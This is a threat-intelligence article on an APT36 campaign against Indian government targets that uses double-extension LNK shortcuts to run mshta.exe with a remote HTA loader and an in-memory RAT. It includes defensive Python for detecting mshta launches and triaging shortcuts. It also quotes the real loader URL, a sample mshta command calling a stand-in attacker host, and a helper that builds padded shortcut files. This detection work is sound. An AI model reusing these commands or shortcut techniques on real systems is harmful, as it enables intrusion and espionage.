APT36 Malware Campaign Exploits Windows LNK Files to Target Indian Government Entities
A sophisticated cyber threat group, known as APT36 or Transparent Tribe, has initiated a new malware campaign specifically targeting Indian government and strategic entities. This campaign leverages a well-known but often overlooked vulnerability within Windows operating systems by exploiting LNK shortcut files, posing a significant threat to national security and sensitive data. The group’s tactics, which include spear-phishing and advanced evasion techniques, highlight the persistent and evolving nature of cyber espionage.
The attack commences with meticulously crafted spear-phishing emails designed to appear legitimate. These emails typically contain a ZIP archive, often named something innocuous like “Online JLPT Exam Dec 2025.zip,” playing on themes relevant to official communications or events to entice recipients. The goal is to trick government officials into downloading and extracting the contents of this archive, thereby initiating the infection chain. The use of deceptive file names and themes is a common tactic employed by APT groups to bypass initial security filters and exploit human curiosity.
Upon extraction, users are presented with a file that, to the untrained eye, resembles a standard PDF document named “Online JLPT Exam Dec 2025.pdf.” However, this is a deceptive facade: the file is in reality a Windows LNK shortcut. APT36 uses a double-extension trick (.pdf.lnk); Windows never displays the .lnk extension of a shortcut, even when the option to show file extensions is enabled, so the name appears to end in .pdf. This deliberate obfuscation keeps the malicious nature of the file concealed and makes it look like a harmless document to unsuspecting victims. The file’s unusually large size, exceeding 2MB, is another trait engineered to mimic a genuine PDF and further mask its true identity; a legitimate shortcut is normally only a few kilobytes.
Infection Mechanism and LNK Execution Chain
The underlying mechanism of this attack is revealed by analysing the LNK file’s properties. When a victim clicks the seemingly legitimate PDF shortcut, Windows does not open a document. Instead, it executes `mshta.exe`, a legitimate, Microsoft-signed Windows utility (the Microsoft HTML Application host) from the System32 directory, and passes it the URL of a remote HTA (HTML Application) script hosted on a compromised or attacker-controlled server. This execution bypasses typical application restrictions and allows the remote script to run with elevated privileges.
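From the endpoint side, the chain just described reduces to a single telemetry pattern: `mshta.exe` started with a URL (or an .hta path) on its command line, spawned by the process the user clicked in, typically Explorer or an archive tool. The following Python is an added example and not code from the article or from the researchers it cites; the Sysmon-style process-creation events, their field names, the host and user names and the `attacker.example` URL are all constructed, and the severity ladder is my own choice:

```python
"""Flag mshta.exe fetching a remote HTA in process-creation telemetry.

Added example, not from the original article.  Events are constructed,
Sysmon Event ID 1 style records reduced to JSON lines; field names,
host/user names and URLs are assumptions (MITRE ATT&CK T1218.005).
"""
import json
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"(?i)\b(?:https?|ftp)://\S+")
# Parents from which a user double-click on a shortcut typically spawns mshta
USER_LAUNCHERS = {"explorer.exe", "winrar.exe", "7zfm.exe", "outlook.exe"}


def _basename(path):
    """Lower-cased file name of a Windows path ('' if path is empty)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(ev):
    """Return a finding dict for a suspicious mshta launch, else None."""
    if _basename(ev.get("Image", "")) != "mshta.exe":
        return None
    cmd = ev.get("CommandLine", "")
    urls = [u.rstrip("\"')") for u in URL_RE.findall(cmd)]
    hta_arg = ".hta" in cmd.lower()
    if not urls and not hta_arg:
        return None  # mshta with no script argument: nothing to act on here
    parent = _basename(ev.get("ParentImage", ""))
    severity = "high" if urls else "medium"      # remote script beats local file
    if parent in USER_LAUNCHERS and urls:
        severity = "critical"                     # remote script from a user click
    return {
        "host": ev.get("Computer"),
        "user": ev.get("User"),
        "parent": parent,
        "urls": urls,
        "hosts": [urlparse(u).hostname for u in urls],
        "severity": severity,
        "rule": "mshta remote HTA execution (T1218.005)",
    }


def scan_log(lines):
    """Run analyse_event over JSON lines, skipping blanks; return findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        hit = analyse_event(json.loads(line))
        if hit:
            findings.append(hit)
    return findings


# Constructed sample log: one benign launch, one remote-HTA launch from
# Explorer, one local .hta from cmd.exe, and one mshta with no argument.
SAMPLE_LOG = r"""
{"EventID": 1, "Computer": "WS-042", "User": "CORP\\analyst", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "\"C:\\Windows\\System32\\notepad.exe\" notes.txt", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Computer": "WS-042", "User": "CORP\\analyst", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\" https://attacker.example/assets/loader.hta", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 1, "Computer": "WS-042", "User": "CORP\\analyst", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe C:\\Users\\analyst\\AppData\\Local\\Temp\\update.hta", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"EventID": 1, "Computer": "WS-042", "User": "CORP\\analyst", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "\"C:\\Windows\\System32\\mshta.exe\"", "ParentImage": "C:\\Windows\\explorer.exe"}
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["severity"], hit["parent"], "->", hit["urls"] or "local .hta")
```

The rule keys on the image name rather than the full path on purpose: a copy of `mshta.exe` renamed or relocated still carries the original name in most telemetry, and the path check belongs in a separate rule. Hostnames are extracted from the command line so they can be matched against threat-intelligence lists or blocked at the proxy.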
According to analyses by cybersecurity researchers, the target path within the LNK file points to a remote loader located at `https://innlive.in/assets/public/01/jlp/jip.hta`. This HTA script is designed to operate stealthily: it launches in a hidden window, shrinks its window frame to effectively zero visibility, and then decodes two primary payload blocks, identified as ‘ReadOnly’ and ‘WriteOnly,’ using custom Base64-decoding and XOR routines. These payloads are injected directly into memory, a technique that makes them harder for traditional signature-based antivirus solutions to detect.
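The on-disk traits described two paragraphs earlier (a document extension hiding `.lnk`, a shortcut padded to megabytes) and the `mshta.exe`-plus-URL target described here can all be checked statically, without opening the shortcut, by reading the Shell Link binary layout. The following Python is an added example, not code from the article or from the researchers it cites: `build_lnk` exists only to construct test samples offline, `parse_lnk` reads the header and StringData fields, and `triage_lnk` applies the traits the article lists. The function names, the `attacker.example` URL and the 1 MiB size threshold are my assumptions, and a target stored only in the shortcut's LinkTargetIDList is not decoded, which is why the triage also sweeps the raw bytes:

```python
"""Static triage of Windows shortcut (.lnk) files per the MS-SHLLINK layout.

Added example (not from the article).  build_lnk() constructs test samples;
parse_lnk() reads the header, skips LinkTargetIDList/LinkInfo and returns the
StringData fields; triage_lnk() reports the traits the article describes.
Names, the attacker.example URL and the size threshold are assumptions.
"""
import struct

LNK_HEADER_SIZE = 0x4C
# LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_RELATIVE_PATH = 0x08
HAS_ARGUMENTS = 0x20
IS_UNICODE = 0x80
# StringData fields appear in this fixed order when their flag bit is set
STRING_FIELDS = [("name", 0x04), ("relative_path", 0x08),
                 ("working_dir", 0x10), ("arguments", 0x20),
                 ("icon_location", 0x40)]
SW_SHOWMINNOACTIVE = 7          # window opens minimised and never focused
DOCUMENT_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt")
MAX_SANE_SIZE = 1024 * 1024     # assumption: real shortcuts are a few KB


def build_lnk(relative_path, arguments="", show_command=1, padding=0):
    """Construct a minimal Unicode LNK (test sample only; relative_path required)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, arguments):
        if text:  # CountCharacters (2 bytes) then UTF-16LE text, no terminator
            body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body + b"\x00" * padding   # padding mimics a bloated file


def parse_lnk(data):
    """Return header flags, ShowCommand and StringData fields of a LNK blob."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00"
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:     # IDListSize + IDList bytes
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:               # LinkInfoSize counts itself
        offset += struct.unpack_from("<I", data, offset)[0]
    info = {"flags": flags, "show_command": show_command}
    for field, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        width = 2 if flags & IS_UNICODE else 1
        chunk = data[offset:offset + count * width]
        info[field] = chunk.decode("utf-16-le" if width == 2 else "latin-1")
        offset += count * width
    return info


def _raw_text(data):
    """Lower-cased ASCII view plus both UTF-16LE alignments of the blob."""
    parts = [data.decode("latin-1")]
    for start in (0, 1):
        parts.append(data[start:].decode("utf-16-le", errors="ignore"))
    return " ".join(parts).lower()


def triage_lnk(filename, data):
    """Return the list of suspicious traits found in a shortcut file."""
    findings = []
    lower = filename.lower()
    stem = lower[:-4] if lower.endswith(".lnk") else lower
    if lower.endswith(".lnk") and stem.endswith(DOCUMENT_EXTS):
        findings.append("double extension: document name hiding .lnk")
    if len(data) > MAX_SANE_SIZE:
        findings.append("oversized shortcut (padded to look like a document)")
    info = parse_lnk(data)
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (launches minimised)")
    raw = _raw_text(data)   # catches a target kept only in the IDList
    if "mshta" in raw and "http" in raw:
        findings.append("mshta.exe invoked with a remote URL (HTA loader): "
                        + info.get("arguments", "<target in IDList>"))
    return findings
```

Run `triage_lnk` over every `.lnk` extracted from inbound archives; an empty list means none of the article's traits were present, not that the file is safe, since the IDList and ExtraData sections (which can also carry a command line) are not decoded here.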
The ‘ReadOnly’ component of the malware is responsible for weakening .NET security checks, thereby creating a more favorable environment for the subsequent stages of the attack. The ‘WriteOnly’ component then loads an encrypted DLL, which serves as a Remote Access Trojan (RAT), directly into the system’s memory. For persistent storage or the exfiltration of further data, a hidden “usb” folder containing a file named `usbsyn.pim` has been observed, likely housing additional encrypted data for later stages of the operation. To maintain the illusion of normalcy, the HTA script also fetches and displays a genuine JLPT exam PDF, so the user perceives the interaction as ordinary document viewing while the compromise of their system is already under way.
This advanced persistent threat (APT) campaign is designed for long-term espionage. The .NET-based RAT provides the attackers with critical capabilities, including remote control over the infected system, extensive data theft, and continuous surveillance. The malware’s ability to operate in memory, utilize trusted Windows tools, and communicate with its command-and-control server over encrypted channels significantly impedes detection and tracing efforts by standard security tools. The implications of such a breach into Indian government entities are severe, potentially leading to the leakage of classified information, strategic intelligence, and disruption of critical services. The ongoing nature of this APT36 threat necessitates heightened vigilance and robust cybersecurity defenses for all targeted organizations.